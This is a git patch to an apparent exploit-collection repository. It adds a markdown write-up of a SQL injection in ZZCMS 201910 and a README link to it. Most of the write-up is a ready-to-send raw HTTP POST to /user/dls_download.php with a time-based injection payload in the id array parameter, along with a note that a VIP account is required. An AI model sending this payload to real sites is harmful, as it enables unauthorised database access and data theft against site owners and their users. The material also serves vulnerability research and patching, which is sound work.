From 6a2c9c9e729e7430b315558221d752e76dfd3933 Mon Sep 17 00:00:00 2001
From: mr-xn
Date: Thu, 2 Jan 2020 19:33:38 +0800
Subject: [PATCH] =?UTF-8?q?add=20zzcms201910=20sql=E6=B3=A8=E5=85=A5?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
 README.md | 2 +-
 ZZCMS201910 SQL Injections.md | 30 ++++++++++++++++++++++++++++++
 2 files changed, 31 insertions(+), 1 deletion(-)
 create mode 100644 ZZCMS201910 SQL Injections.md
diff --git a/README.md b/README.md
index 78fcfac..bf90164 100644
--- a/README.md
+++ b/README.md
@@ -98,7 +98,7 @@
 - [CVE-2019-2107-Android播放视频-RCE-POC(Android 7.0版本,7.1.1版本,7.1.2版本,8.0版本,8.1版本,9.0版本)](https://github.com/marcinguy/CVE-2019-2107)
 - [CVE-2019-19844-Django重置密码漏洞(受影响版本:Django master branch,Django 3.0,Django 2.2,Django 1.11)](https://github.com/ryu22e/django_cve_2019_19844_poc/)
 - [CVE-2019-17556-unsafe-deserialization-in-apache-olingo(Apache Olingo反序列化漏洞,影响: 4.0.0版本至4.6.0版本)](https://medium.com/bugbountywriteup/cve-2019-17556-unsafe-deserialization-in-apache-olingo-8ebb41b66817)
--
+- [ZZCMS201910 SQL Injections](./ZZCMS201910%20SQL%20Injections.md)
 ## 提权辅助相关
diff --git a/ZZCMS201910 SQL Injections.md b/ZZCMS201910 SQL Injections.md
new file mode 100644
index 0000000..df059f6
--- /dev/null
+++ b/ZZCMS201910 SQL Injections.md
@@ -0,0 +1,30 @@
+## ZZCMS201910 SQL Injections SQL注入
+
+> 前提是你有一个具有购买权限的VIP会员账户
+> 不然会提示:`"您所在的用户组没有下载此信息的权限!
"`
+
+### 注入点 ` user/dls_download with parameter $id`
+
+### 利用POC如下
+
+```raw
+POST /user/dls_download.php HTTP/1.1
+Host: test.com
+User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:71.0) Gecko/20100101 Firefox/71.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 45
+Origin: http://test.com
+Connection: close
+Referer: http://test.com/user/advzt_manage.php
+Cookie: Hm_lvt_f6f37dc3416ca514857b78d0b158037e=1576564072; Hm_lvt_520556228c0113270c0c772027905838=1576734687,1577071433; app_href_source=myapp/free; PHPSESSID=f0fb73cc2f2d41d2a3b1edb7340841a3; arrlanguage=metinfo; Hm_lpvt_520556228c0113270c0c772027905838=1577672843; acc_auth=4b90lwFZZGUdz47dUybObYz1MoB612Tg7bCn10U0P4BKoY%2FR9nnvQapvPIBF%2BB4w11KPOWCNH%2FLvwx9rH7424ZH0; acc_key=eXM7G4F; __tins__713776=%7B%22sid%22%3A%201577775703119%2C%20%22vd%22%3A%201%2C%20%22expires%22%3A%201577777503119%7D; __51cke__=; __51laig__=28; bdshare_firstime=1577771760963; UserName=test; PassWord=4297f44b13955235245b2497399d7a93
+Upgrade-Insecure-Requests: 1
+Pragma: no-cache
+Cache-Control: no-cache
+
+id[]=1&id[]=2)%0aor%0asleep(5)%23&FileExt=xxx
+```
+
+来源与:https://github.com/JcQSteven/blog/issues/15
\ No newline at end of file